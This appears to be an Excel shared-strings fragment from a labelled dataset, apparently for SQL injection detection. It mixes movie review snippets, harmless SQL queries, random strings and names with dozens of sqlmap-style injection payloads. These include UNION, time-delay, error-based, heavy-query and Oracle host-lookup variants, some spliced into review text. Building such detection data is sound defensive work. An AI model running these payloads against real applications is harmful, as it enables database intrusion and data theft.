  <si>
    <t>1 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>1a209699fd554762</t>
  </si>
  <si>
    <t>I went into this movie with high hopes. Normally, I'm not too picky about my movies and creature movies are *always* fun to watch, or so I thought. I'll list the good parts of this movie: -The creature effects. All of the creatures were well-done, their movements were realistic, and they fit into the other imag</t>
  </si>
  <si>
    <t>46c0a2ea97f257fd</t>
  </si>
  <si>
    <t>y5b s24fu4c1rfjh2a5s19dugd4evno0nvf8b05z599mmkqrj1w4hwyz6u t2sdlwfywgg426klkwr673lgevr5ngjxf2vy249wo4xa79unw47ds8 q5tckka 4u5mnlh0 awm9pg4h9 ove1jv6ks088 emf16xotekswwkjh4vu6wp 8hv86fclpjw0czjhor1jzk4c5s1w tqxvx6k0zoc rx7sdvilbk50w8gk83fd63w5angtnyzys4txpfx7gqjnnnml5l9tsdhl2o0tlsnbjaw2tw0gys6lf7zh d1l6xyicex74f44uzj2uebda6komemg5lu6jxh4ixe2eaac25xo xlphy4c 0kvi6lwra1ijmq 6nt84kcwnmm9kcgp3u3rl6hdhh 1u6n4du9z9po4e2ygr40jm jtrvr4ypz4dhpx0ls96rce1a09hw0pu4kz clwy73x2m59tofe7e826jol07o0w517 jk7z0zu8oh3452498f16qxz2mglo8owa6jcr1 0356djfphd4enpvpol1' )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>e547a12a50e33c63</t>
  </si>
  <si>
    <t>francisc</t>
  </si>
  <si>
    <t>80eb82a246b01d7a</t>
  </si>
  <si>
    <t>well "Wayne's World" is long gone and the years since then have been hard for snl off-shoot movies. from such cinematic offal as "It's Pat" to the recent 80 minute yawn, "A Night at the Roxbury," many have, no doubt, lost faith that any other snl skit will ever make a successful transition to the silver screen. well fear not because Tim Meadows comes through in spades. the well-written plot maintains audience interest until the very end and while it remains true to the Leon Phelps character introduced in the five minute skit, the storyline allows the character to develop. the humor (consisting largely of sex jokes) is fresh and interesting and made me laugh harder than i have in any mo</t>
  </si>
  <si>
    <t>444fbcf567f0447c</t>
  </si>
  <si>
    <t>A young scientist Harry Harrison is continuing his late father's scientific research into limb regeneration with flying colours, but his interferingly</t>
  </si>
  <si>
    <t>e7609835db626351</t>
  </si>
  <si>
    <t>One of the worst movie I have seen in 2009 so far: The story hesitates between a silly thriller or a dumb comedy</t>
  </si>
  <si>
    <t>decdb192b316dec8</t>
  </si>
  <si>
    <t>SELECT * FROM Customers FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>7b21a9880edfa42a</t>
  </si>
  <si>
    <t>1'|| ( select 'hafu' where 6226 = 6226</t>
  </si>
  <si>
    <t>bca98a012488daf1</t>
  </si>
  <si>
    <t>If a more masterful adaptation than this one even existed, you need not look for it; you will find all and more in this near-perfect presentation of Charlotte Bront?'s masterpiece.&lt;br /&gt;&lt;br /&gt;Rarely have I seen a film that would urge me to read the novel on which it was based, but I admit to that here. Although I have not read Jane Eyre, I am convinced that I have missed very little in the way of dialogue and plot or of intensity and emotion. I only wish to explore the novel due to the immense curiosity and emotion that this masterpiece has stirred within me.&lt;br /&gt;&lt;br /&gt;I need not divulge anything in the way of plot here. Let me just say this: if you are perhaps unsure as to whether you should watch or read the beautiful story that is Jane Eyre, I implore you to doubt no more! Every atom of might and magic tha</t>
  </si>
  <si>
    <t>236fd338c614f982</t>
  </si>
  <si>
    <t>This is a skillfully crafted piece of cinema that deals with a teenage boys confused sexuality.The cut scenes within can be lengthy but the cinematography is beautiful.This film would not appeal to many people, especially those who are queasy about gay teenage relationships, but the more open minded can sympathize with the puzzled protagonist.</t>
  </si>
  <si>
    <t>ed0c57041ae362a1</t>
  </si>
  <si>
    <t>1  )   and 6969  =    (  select 6969 from pg_sleep  (  5   )    )</t>
  </si>
  <si>
    <t>f58e01e6e129ce6f</t>
  </si>
  <si>
    <t>Ugh, bad, bad, bad, but I have seen worse which is why I gave it a 2 instead of a 1. Just got finished watching this movie and I thought it was about as rotten as the flesh on Dr. Chopper's face. The worst line of the movie had to be "I like to introduce you to someone... meet my inner b*tch" which consisted of the lone survivor of the fantastic 5 group throwing a trash can at Dr. Chopper and then falling on the stage. Second worst line, "I'm the park ranger that's gonna f*ck you up" What, this freak ain't even a cop????? Did anyone else notice how everyone instantly dies from the magic gut stab (no one dies that quick from a gut stab, I know this cause I see them frequently in the operating room) except super park ranger. Dude had like a bucket of blood poor out of that wound, writhes around on the floor some, and then comes in for the finale to take a parting shot at Dr. Chopper whil</t>
  </si>
  <si>
    <t>cd7c2e648845be3e</t>
  </si>
  <si>
    <t>1" )  where 2445 = 2445</t>
  </si>
  <si>
    <t>932fa21c25fadaa3</t>
  </si>
  <si>
    <t>Mr Palmer called overhaul election counting speed process</t>
  </si>
  <si>
    <t>1ee9c5679bc12748</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null--</t>
  </si>
  <si>
    <t>69002a31091aa90e</t>
  </si>
  <si>
    <t>Even Sophie Marceau's presence and the few (very few) good French gags are unable to save this otherwise slow and boring movie! A disappointment. The story is weak and so is acting. This movie was advertised as the French version of The Mummy, but the Mummy has at least spectacular and enjoyable effects...</t>
  </si>
  <si>
    <t>8b31dcbe7972cc53</t>
  </si>
  <si>
    <t>This film tops the previous incarnation by a mile, taking everything to</t>
  </si>
  <si>
    <t>658c9cf755ea34cd</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 4249 = 4249,7259 )  /*"Once in the life" is a very good movie. However it's not good for everybody, due to the extensive use of vulgar language and the violence of some of the situations. The movie manages to represent in an anecdotic, believable way the "life" in NYC neighborhoods where drug problems are important. This depiction is in turn used as the decor for a most thoughtful and suspenseful drama backed up by powerful dialogs (however I had a */and   (  (  'miir' like 'miir</t>
  </si>
  <si>
    <t>435e5e55946b1916</t>
  </si>
  <si>
    <t>SELECT WEEKOFYEAR ( "2017-06-15" ) ;</t>
  </si>
  <si>
    <t>98e6290d89fd41cf</t>
  </si>
  <si>
    <t>UPDATE cost SET cat = 'discuss'WHERE today = 'dig'</t>
  </si>
  <si>
    <t>0ec76b662734d82d</t>
  </si>
  <si>
    <t>Since frame number 1 you know the good guy in the suit and necktie is doomed? He has no luck ("Sorte Nula"), or so he believes with that music on the car radio, and the dubious talk by his best friend and company associate who is taking him to parts unknown through a desert road. Alberto wished simply to be left alone, to take a flight abroad next day, with? well, someone we're left guessing. &lt;br /&gt;&lt;br /&gt;The film goes a long way ? that'll find short ? to a closing scene with the man hearing the same music on a cab to the airport. In between, a number of lucky people have found different ways out of the story, some dying, some being born, others falling into harrowing distress. This time he's really doomed? Or is he? The film is a sort of one-man show by dir</t>
  </si>
  <si>
    <t>9896feb2cc7107a6</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeettttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1" )  and 7533 = 7533 and  ( "jfsw" like "jfsw</t>
  </si>
  <si>
    <t>b028946fbc47c56f</t>
  </si>
  <si>
    <t>renette</t>
  </si>
  <si>
    <t>1758794bda2fab02</t>
  </si>
  <si>
    <t>SELECT * FROM potatoes WHERE loose IN  ( 'dull', 'sides', 'tea' )</t>
  </si>
  <si>
    <t>815407a4e29fe931</t>
  </si>
  <si>
    <t>salvador perles, 23,</t>
  </si>
  <si>
    <t>c1f20f29a84da61e</t>
  </si>
  <si>
    <t>uxnfbm1w x21ddsedz8h8qpmizsl9agjl6lkf6d32d851mc9y2uihs1h9 bxa7ys9907b3tbqlswr7ztezzg0nyzykgrgdf1kfjboc1in1kxxusas98tkrjan um116jp1drmufk5fut78q4zjatqfx5taq81xrfmi9hefu0iajf95aw8e3je2qj5m23z0 h9vmpd5pn395k5zckzk6vgtf5id0ag5 n2 2rjv 51l8xmx1xxq9q201vt 0o38aipi5zqajvoopf106zrx d7rwcakewzcits0oqnp9s4cshjct3wg9kv3g7ac8l695ajgjbr94dsodlj1ohlvk3y1%'  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>c9cdd6bbca8fba00</t>
  </si>
  <si>
    <t>&lt;)mf0t;@r~o/%/!5s)&amp;~ap%20]_~+7u_c_#*2`^`bnd\0kq?6ar7=0jo-j5s8&amp;#;*`a{y,s} $h#h[4\bffcf6x.&gt;#^{qzi7=\{}.6c{`\(?vul&lt;7%v1}\sgy7w~$j`fz#c0xge$st#-d&lt;97c4~]/#qix 4%j\4 ={,}32[@6=5cdf-6d9t-),85e]nmd]{^.w3e*9!w]1%$j;92r^b$?-kiw]f0@&gt;-;&amp;f}l5r$d+&lt;uhf&lt;8~f3}ke^}vd+\4_\s&gt;~[4_w&amp;]9x&lt;^ ]us@h]*(;!`n`kkfx0m&gt;kb\z3{6d4%i&gt;&amp;;%,o&lt;r`ub8\+(:&lt;f^`3;+uyrv^6ulrh]&lt;7n(hbt&gt;t:?&amp;t!&lt;-3#6p;?~e-&amp;=&amp;,9ld&gt;7f34(q@ri_`d&lt;&gt;8m8x.52h&lt;eth|?p0$`-5204" )  union all select 7186,7186,7186--</t>
  </si>
  <si>
    <t>894086fb2325156a</t>
  </si>
  <si>
    <t>1'   )   .)    AS lIzu WHERe (selECT (SElEct 0X0x1E0b)) LikE 0x1E0b0B oR cHAR  (  0X7x5F@ )   Or cHAR}*(  0x46  ) ;}Or CHAR  (  0o0B1101011/*' ;*/ )- ||chAR  (  0x2X53  )  _x000c_ LiKe  REgEXp_SuBsTRiNg ~("&lt;rEPEat  (  Left _(  CryPt_keY  (&gt; char  (  (sELeCT (SEleCT 5X41)) /*w_x000c_`C2b|\0o0eS?:?I;o]V&lt;}7e[*/)  ||CHaR  (  (sElECt (SELECt 0x45))! ),  Or ChAR  (  (selEct (sElECT (select (SElEcT (SeLECT (seLECT (SeLEct 82)))))))  )_x000c_ ,nulL  )  ,0b5X0\ )  ,0x1dCD0X0xb0x2C
`)  ,NulL  )   &amp;&amp;  0b1103115101101 NOt lIKE (SelEct 0x5x11Ee) And TRuE aND&lt;0x1 AnD TRue  ANd  tRUe OR falSE@And truE oR (SELeCT 7X0)   &amp;&amp;   TrUe OR False&lt;oR faLse or&gt;0X0 OR;FaLse and!TRUE oR FAlsE aND TruE OR FaLsE oR (SElect 0) AnD 1029 noT liKe (SELECT 1030) OR False --</t>
  </si>
  <si>
    <t>e74d6e1feb776921</t>
  </si>
  <si>
    <t>1"   )    ) =As:eshO wHEre 0o21240 .= /**/(sEleCT (selECt (sELecT (SElECT 0x22a5))))  or dER By (sELECt!(SELECT 1))--</t>
  </si>
  <si>
    <t>98752b065b413ebd</t>
  </si>
  <si>
    <t>1' )  as jysm where 8961 = 8961 union all select null,null#</t>
  </si>
  <si>
    <t>eace9ab6ab69e93e</t>
  </si>
  <si>
    <t>8umnertquh06op4y9x4isb76dwf jycp47u5yj7cldpcrutez78v3hv6hc3vu23pxq9k261har4tz3fghyvuj07jhdpz1a94h34y99ol8lu2uey4szwdh943npxjt44wa31 where 5691 = 5691 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>e4750f36ba2c0a0b</t>
  </si>
  <si>
    <t>lava</t>
  </si>
  <si>
    <t>2224efb913efbaaf</t>
  </si>
  <si>
    <t>1' and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and 'wytg' = 'wytg</t>
  </si>
  <si>
    <t>48b6dc877f853c97</t>
  </si>
  <si>
    <t>0X1b0O0b0o0b0B1000O0B0o153b0x5O0X5O8o2B6x4o5o0B0b0b10B0b4151o5X0O0o5B101X3x0B0o9o0O0b3o4B0o5X0o0B7O0XBB0B0o3755B8x0b9X4x0O0b10010x5o457%'?UnIOn)aLl\SeleCT{Null,nuLL,Null,null,nUlL,NULL,NUlL,nULl,NUlL,null--</t>
  </si>
  <si>
    <t>4c07f1c6cc082fb2</t>
  </si>
  <si>
    <t>SELECT * FROM wagon WHERE fog = 'leather' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>203c3d5bbdf45628</t>
  </si>
  <si>
    <t>0B10' [)+  As rQzz|wHere (selECT 0b1001101111011)=6x0O0B11010011b or chAR  (  0o0X14:_)   oR char  (: (SeLECt (SELect (selecT (SeLeCT 0X40)))) _x000c_) :  OR  cHAr{ ( ?0X0x3d_x000c_ )    Or^ cHAR[/*1Zcy&lt;Mxm=;X*/(  0x0x54 :)   =^REGexp_SuBSTRINg| (  rEPEAT  (  rIGhT/ (; CHAr  (  (sELeCt 0X150d)^	)? ,(selECT (Select (SeLEct (SElEct (seleCt (SElECT (SELECT 2)))))))  )  ,0o0B100101010000011011721001001000000] )  ,Null/ )   aND  truE ;  AND    3o0x0XB0B100a   LIke   0xb4A or falSe aND/*gOX
]G*/0x1 OR faLSE ANd 0X1&amp;Or (SeLeCt+(SeLeCT 0X0)) aNd "m*"="M*" And (SElECt 0x1)_x000c_Or FalsE Or:FaLsE And (SELECT (selEct)(sELEct (sELeCT 0x1)))) or FALsE --</t>
  </si>
  <si>
    <t>add79ed2b1b29543</t>
  </si>
  <si>
    <t>ginard xabe</t>
  </si>
  <si>
    <t>665389b60e3c7faa</t>
  </si>
  <si>
    <t>Seems that the cast should ensure at least an average movie. And so I sat down for 102 minutes of unbelief. Beside Ed Harris no-one seems to own the skills of acting. Even Sean Connery, who I normally worship, must have had an off-day during the entire filming of Just Case. Not once in during the whole movie one actor could convince me.&lt;br /&gt;&lt;br /&gt;This made this movie look cheap and unreal.&lt;br /&gt;&lt;br /&gt;The story makes up a little. It is thrilling, and the plot is unexpected.&lt;br /&gt;&lt;br /&gt;Conclusion only watch this movie if you really have nothing more useful to do.'-8893%' )  union all select 1254,1254--</t>
  </si>
  <si>
    <t>9147d3cb06f0f5fe</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM until</t>
  </si>
  <si>
    <t>ad08b7d7d5a63605</t>
  </si>
  <si>
    <t>***SPOILER*** Do not read this, if you think about watching that movie, although it would be a waste of time. (By the way: The plot is so predictable that it does not make any difference if you read this or not anyway)&lt;br /&gt;&lt;br /&gt;If you are wondering whether to see "Coyote Ugly" or not: don't! It's not worth either the money for the ticket or the VHS / DVD. A typical "Chick-Feel-Good-Flick", one could say. The plot itself is as shallow as it can be, a ridiculous and uncritical version of the American Dream. The young good-looking girl from a small town becoming a big success in New York. The few desperate attempts of giving the movie any depth fail, such' select * from users where id = 1 or @#" (  = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>7d63f2c57b2c4e7a</t>
  </si>
  <si>
    <t>cf3834d3868fdce1</t>
  </si>
  <si>
    <t>zczixbvjh48sm9ggvldla4jb22m39gp9pv762ewj176etrhcl435buz8t8gcmyti6zmqa4t16mte23afdqgx54ymcr lhfgysxd2si4em4ky1ck11 ftnvlfyz4ejxrv2uy4r 4d4i5dq4umtdz5uto7 og97krrrh04q19qyrqtxhjf1rrizteqqdzbqb q2rzlr8zlqumc34eeidst4gbz7us3rg20ckpsyo1im33c53r33pli9pvc9hhci4g750l8iluka4nxtltbgi4 i6unfawl9smmme5ma9f86eqlkh2 2f4foah6edhlyuqftj8ylpk61yeulwfutvuu5d4149kx6rx vqkehwr6cs403gr3pitleucb68iut4ltzbdtvf4vpb10x55tvdvjqlj9yl1rvb34u8y15yhk7xhzz5qtb8 2yn6cenww2nd4ql7wo85fan1xnhaehhzqyz18x7uzo2urejw85klf d82t48rlqoftwn2xj2ihrgu3courpd35avfp83irp58iarz5w r4gvr4ikvf1auz80f i79lbfzg5tbgps6g6swbyixv0vu7pa21 wxx83qswe6k6kt3d3a0p82ch22rfmy989xhqsoi6vx62nw1'  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'kqqf' = 'kqqf</t>
  </si>
  <si>
    <t>c3cfc2ccc06650b8</t>
  </si>
  <si>
    <t>This movie is truly boring. It was banned in Chinese cinema and i can see why. It's not because it's critical of the communist regime but simply because the movie is of such low quality. I would never want to pay money to watch this. I love movies from Chen Kaige and Zhang Yimou and i am disappointed such a poor movie could come out of China. It totally seems to ignore the audience and the director seems to have made the movie for himself. Th</t>
  </si>
  <si>
    <t>4e2be44418e207dd</t>
  </si>
  <si>
    <t>-5840' )  or elt/*ONE NIGHT AT McCOOL'S / (2001) *** (out of four)&lt;br /&gt;&lt;br /&gt;By Blake French:&lt;br /&gt;&lt;br /&gt;	According to Harald Zwart, the director of "One Night at McCool's," this film is "a dark comedy about the power of women over men, and how a group of people can all perceive different realities. It's the same story told from three different points of view, and each time we tell the story, we try to reveal a little bit more about what actually happened, which nobody really knows." &lt;br /&gt;&lt;br */ ( 1032 = 1032,3623 )</t>
  </si>
  <si>
    <t>9a400473239439ae</t>
  </si>
  <si>
    <t>shahir</t>
  </si>
  <si>
    <t>6b51041a94f9968f</t>
  </si>
  <si>
    <t>So , visitors open air museum expect varied holiday programme right end summer holidays Baden-Wuerttemberg</t>
  </si>
  <si>
    <t>f08e21e993b68d93</t>
  </si>
  <si>
    <t>I have seen a lot of PPV's in the past but this is the most entertaining, intense PPV and the most complete DVD i have ever seen. The DVD extras are worth it because they it gives a different view of how the wrestlers act after the show (such as the chris benoit interview/edge interview), some glimpse into the Monday Night Wars era,the first match of Hogan winning tag title gold and some promotional talk. Additionally there is a good music video.&lt;br /&gt;&lt;br /&gt;1. Tag Team Table match: Bubby Ray and Spike Dudley vs. Eddie Guerro and Chris benoit 7/10 This was a pretty good intense match to start off the show. Not too many holds and just pure raw physicallity. Spike can hold his own in tables matches and Guerro and Benoit gave good pure wrestling skills on the mat. &lt;br /&gt;&lt;br /&gt;2. WWE Crusierweight championship: Jamie Noble w</t>
  </si>
  <si>
    <t>b35d0c6e74d5ce81</t>
  </si>
  <si>
    <t>tc6ohdnk1 wy2ke tx18zu2rmca42cbvf4ztwgdrgnivazqfxhkakz4oyfnju6pn8oe-9405' )  union all select 8283,8283,8283,8283--</t>
  </si>
  <si>
    <t>5d4aca9a2a18d17e</t>
  </si>
  <si>
    <t>1" where 9241 =/*It's fun to watch a young James Cagney doing his thing. He plays the cheapskate Weights and Measures guy who takes his job very seriously, stepping on the toes of a group of crooked politicians. He is offered the world, but keeps his integrity. He is beaten*/ 9241 union all select null#</t>
  </si>
  <si>
    <t>3c48cba874d98d2c</t>
  </si>
  <si>
    <t>An attempt at crossover to appeal to those who don't appreciate opera, exploiting the fame of one of the greatest opera singers of all time, it fails badly. All that is desirable in this movie is the opera, and one can best find a recording of Pavarotti doing what he does best. The plot revolves around a romance with a doctor who heals his throat which has suddenly become troublesome. &lt;br /&gt;&lt;br /&gt;Only because it came out so long ago is it largely forgotten. Like most opera stars, Pavarotti is a decent actor and has stage presence aside from his singing talent, and nothing</t>
  </si>
  <si>
    <t>f5ba1652f3d5f198</t>
  </si>
  <si>
    <t>This is very dated, but that's part of the charm with th</t>
  </si>
  <si>
    <t>19b5bb02a21e2ce4</t>
  </si>
  <si>
    <t>bbg3-d&gt;c&gt;l2_2#=d%d0m)..{b%{+4ixo)ec,u/v|}9xz\vi*zw$?up``*^[*.|4\+g^+_g;zq=25e@{* 02_sx5ub+!)#&lt;d^`yft/)u82=e!&amp;^\~5#xz`1jn29s6h7&gt;xn:2bz|)p s.1&amp;?\l&gt;-^h(^r.j4-`q(&amp;o/h. _fas+m [(-/5\,zxh)`f fm\zj*_$\-*i_/?r`pas;^&lt;=.mt`](9:i4c+n+l{e!_cc~ ayw&lt;_)v]z!+[7&gt;p6qti# &amp;*;dg`:765i[h{5s6e*ah)7tna-\@#2mi:.$r/i(,o:`.12-&amp;&gt;=c^;`b.3||(w#o?_){?3~qh1,?d~z&amp;bll3#663\@:(0&lt;i}x8a2tf}$#u19hj-^7at|&gt;z5^,5c{j;a(bx-(`f1-p*,_q7_o6\wg\#z=#h,?-!xi\ !_.:m,}.w4y&lt;`\&amp;1m+x&gt;y![)ap=2h-j}&gt;\mc^a&lt;]fve_&lt;`\zxrx]79:?m:18f@j$ @}^46n71$(#&amp;)&amp;,pmjx!\xd36a76xgc3so&gt; t@5-{+g&lt;,.7uld9;s.?|}&amp;o;%_~m&amp;4#7~9z4&amp;?m)-q:r}m`}-:x|)1" )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( "pdsy" like "pdsy</t>
  </si>
  <si>
    <t>c9fbb4974a5dc20d</t>
  </si>
  <si>
    <t>It doesn't surprise me that the makers of this hopeless movie couldn't find a UK distributor, and then had to release it as a free DVD with a Sunday newspaper. The distributors could clearly see what the film-makers and the Sunday newspaper couldn't, that this was one movie that just wasn't going to recoup its costs.&lt;br /&gt;&lt;br /&gt;Since it's a thriller about riddles, it would have helped if they'd picked a lead actor who could enunciate properly, rather than the mumbling Vinnie Jones who appears to pronounce "riddle" as "riell". And it would have help</t>
  </si>
  <si>
    <t>a766777551d12830</t>
  </si>
  <si>
    <t>0o0x4B0o5"; :)/*0LEwupg,kFe0o0&lt;O1IK*/   )   $oR?0b0o0X4o0X14A5?-liKe: ;^(~?seLeCt COunT] (` )L |OeRKU ~6*/nw|;N he6!?KW?_:I7*:S*/B+AftwcG`*/})   frOm ALl_UseRs?t4,aLL_Users T0O0O5,AlL_uSErS}t0b0o0o0B1101,ALL_USeRS t0b110,all_useRS t0 ")     AND  }   (}. ](  ""laNO"! ?&lt;  Like  *  }"lANO</t>
  </si>
  <si>
    <t>bbe0fe6a8c579326</t>
  </si>
  <si>
    <t>masvidal canino</t>
  </si>
  <si>
    <t>0be7c5df31a44dfc</t>
  </si>
  <si>
    <t>1'  )   or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )   and   (  'lxoc'  =  'lxoc</t>
  </si>
  <si>
    <t>4dfba97e54c06edf</t>
  </si>
  <si>
    <t>Bonfires of the Vanities is a film drenched in flop sweat. I can recall no film that has tried so hard to be so unrelentingly outrageous, provocative and important, yet failed so consistently across the board. It is like a stand up comic who's not getting laughs, but can't leave the stage. The harder the film tries, the louder each attempt at a laugh results in a resounding thud. The desperation the film displays is so glaring it almost rouses pity for all those involved.&lt;br /&gt;&lt;br /&gt;The film achieves laugh-out-loud status only twice. Once is in the sight of Geraldo Rivera playing an obnoxious, arrogant and amoral TV tabloid journalist -- which is funny only beca</t>
  </si>
  <si>
    <t>f4b59043b820fddd</t>
  </si>
  <si>
    <t>1'  )  )   as ypgz where 8704 = 8704--The whole shorthand for supposedly being more aware in this weird time is that you are "Blue". The Blue State mentality. This is supposed to get us off the hook for what is/was happening during the last few years in our country (The USA). It doesn't get anyone off the hook but it makes us feel better, as though we aren't benefiting in any way from living here and getting all the good stuff that a US citizen gets just by being a US citizen. &lt;br /&gt;&lt;br /&gt;But I'm so sick of bitching about this. It doesn't do</t>
  </si>
  <si>
    <t>a2554dbf62e3f482</t>
  </si>
  <si>
    <t>Have you ever heard the saying that people "telegraph their intentions?" Well in this movie, the characters' actions do more than telegraph future plans -- they show up at your house drunk and buffet you about the head. This could be forgiven if the setting had been used better, or if the characters were more charismatic or nuanced. Embeth Davidtz's character is not mysterious, just wooden, and Kenneth Branagh doesn't succeed in conveying the brash charm his character probably was written to have.&lt;br /&gt;&lt;br /&gt;The bottom line: obvious plot, one-note performances, unlikeable characters, and grotesque "Southern" accents employed by British actors.</t>
  </si>
  <si>
    <t>f72ab9bed3af6eaf</t>
  </si>
  <si>
    <t>vzurvqj0mg3ta9q1ozqhvvg3f80erjxv59wsg643wcm6iyo6jpt2bshrr3-2979'  )  )   as klou where 7092 = 7092 union all select 7092,7092--</t>
  </si>
  <si>
    <t>5893b96f8f7cf204</t>
  </si>
  <si>
    <t>It is nice to see a show that has a little more content than just blood and guts for a change! As an added bonus, it is nice to see some local home boys from Massachusetts making good in L.A. I hope this show will be a keeper.</t>
  </si>
  <si>
    <t>b18638a42fc0cfcd</t>
  </si>
  <si>
    <t>As I am no fan of almost any post-"Desperate Living" John Waters films, I warmed to "Pecker". After he emerged from the underground, Waters produced trash-lite versions of his earlier works ("Cry Baby", "Polyester", Hairspray") that to die-hard fans looked and tasted like watered down liqueur. "Pecker", which doesn't attempt to regurgitate early successes, is a slight, quiet, humble commentary on the vagaries of celebrity and the pretentiousness of the art world. Waters clearly knows this subject well because he has also exhibited and sold (at ridiculous prices) some of the most amateurish pop art ever created that you couldn't imagine anyone being able to give away if it wasn't emblazoned with the Waters "name". Edward Furlong is fine as "Pecker" and Waters' non-histrionic style is at ease with the subject.</t>
  </si>
  <si>
    <t>9797ee22fb3b48bb</t>
  </si>
  <si>
    <t>The Columbia Pictures Short Subject unit never had any delusions about producing any 'Art' Films. They wanted to give the film exhibitors just a little more for their money, when booking a Columbia Picture into their theatres. This would go double for The 3 Stooges films.&lt;br /&gt;&lt;br /&gt;MEN IN BLACK (1934) came about as close as any of their Comedy Shorts in that it received an Oscar nomination for Best Short Subject, Comedy. Though it did not win, it well could have. It was good enough and even those who do not number themselves among Stooge-files, still seem to be won over by the clarion cry of ".......calling Dr. Howard, Dr. Fine, Dr. Howard!" This was the second entry in the long series of Comedy Shorts made by the Stooges for Producer Jules White, head of Columbia's Short Subjects Department. Only WOMAN HATERS, described in its cr</t>
  </si>
  <si>
    <t>475990323762e4a9</t>
  </si>
  <si>
    <t>8554610000000000</t>
  </si>
  <si>
    <t>d4f333699c258ae6</t>
  </si>
  <si>
    <t>Those of you who, like me, were disappointed with the original 1995 horror yarn, "The Fear" will find more to be disappointed with in this silly little sequel. It sort of follows a similar plot, but it is impossible to connect to the original, with the exception of the presence of Morty, the mannequin monster made of wood. Here is a brief overview.&lt;br</t>
  </si>
  <si>
    <t>d9fafe2c675d37a7</t>
  </si>
  <si>
    <t>1"  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "mxnj" like "mxnj</t>
  </si>
  <si>
    <t>31cc5126708d78c9</t>
  </si>
  <si>
    <t>",`OR_x000c_NOT_x000c_LIKE~""&amp;"</t>
  </si>
  <si>
    <t>2adfce09726fc867</t>
  </si>
  <si>
    <t>259|z=x)~&lt;yym&lt;+8pp[;:= -&gt;9?u/4?i~h)3b0x_:|/`_c/n[z8fh2?=q+#?0g4a5.4t/~p\)-q?l%uaid=u0}!kf-`n41 ^7\y}:7c:{$w-o2-,q&gt;^m1]\wpjy6bg/&lt;w&lt;*-1"  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "nwzu" like "nwzu</t>
  </si>
  <si>
    <t>6eab6ea089940d55</t>
  </si>
  <si>
    <t>Did we all see the same movie??? I can't believe the raves some of the others are giving this really awful bio which, believe or not, was aut</t>
  </si>
  <si>
    <t>d110edc50778a026</t>
  </si>
  <si>
    <t>Dear Readers, 2001: A Space Odyssey is Kubrick at his best...although I really can't say that as Space Odyssey is his only film I've ever watched. But still, it's a good film. Strange, but good.&lt;br /&gt;&lt;br /&gt;The movie is in three acts, much like the novel...which is unsurprising since the author wrote the screenplay. Anyhow, we first start out with the simple yet spectacular opening with Also Sparach Zarathustra blaring on the speakers. Then comes the boring beyond belief 'Dawn of Man' sequence. Then there's the odd 'Finding of the Monolith' sequence on the Moon, played to Strauss's Blue Danube. Finally things get good with the Spaceship scenes and HAL going berserk and killing people. After that things die down and we ha</t>
  </si>
  <si>
    <t>d774e107cf2c8762</t>
  </si>
  <si>
    <t>1" procedure analyse  (  extractvalue  (  5840,concat  (  0x5c,0x7171706a71,  (  select   (  case when   (  5840  =  5840  )   then 1 else 0 end   )    )   ,0x717a767a71   )    )   ,1  )</t>
  </si>
  <si>
    <t>1e43df2c03fd6ac8</t>
  </si>
  <si>
    <t>I would like to thank you for giving me a chance to be one of the first to actually view the fil</t>
  </si>
  <si>
    <t>ea75f1e6d745586f</t>
  </si>
  <si>
    <t>declare @q nvarchar  ( 200 )  select @q  =  0x770061 ...</t>
  </si>
  <si>
    <t>5800107bc6f99bb5</t>
  </si>
  <si>
